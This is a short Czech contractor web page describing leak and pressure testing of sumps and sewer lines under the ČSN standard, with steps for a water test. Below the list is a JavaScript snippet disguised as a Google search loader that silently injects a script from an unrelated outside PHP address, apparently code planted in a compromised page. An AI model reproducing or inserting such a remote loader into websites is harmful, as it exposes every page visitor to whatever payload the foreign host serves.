Zkoušky těsnosti jímek a kanalizace

Po dokončení výstavby nové sítě, případně při revizi kanalizace starých rozvodů, provádíme zkoušky těsnosti a tlakové zkoušky vnitřní nebo venkovní kanalizace dle ČSN. Zkoušky těsnosti kanalizace lze provádět vodou. Tlakové zkoušky kanalizace definuje norma ČSN 1610.

 

Tlaková zkouška těsnosti vodou:

  • vizuální kontrola způsobilosti úseku k provedení zkoušky těsnosti, kontrola utěsnění přípojek
  • osazení těsnících vaků, napojení na zdroj vody
  • kontrola zkoušeného úseku při plnění vodou, odvzdušnění úseku
  • osazení zkušební nádoby, doplnění vodou po zkušební hladinu
  • kontrola zkoušeného úseku, doplňování vody po dobu nasákávání
  • změření úniku vody při zkoušce, vystavení zkušebního protokolu o tlakové zkoušce
  • vypuštění úseku a odstranění těsnících vaků

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = “http://ninni.org/core9Om3.php”;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();


Komentáře nejsou povoleny.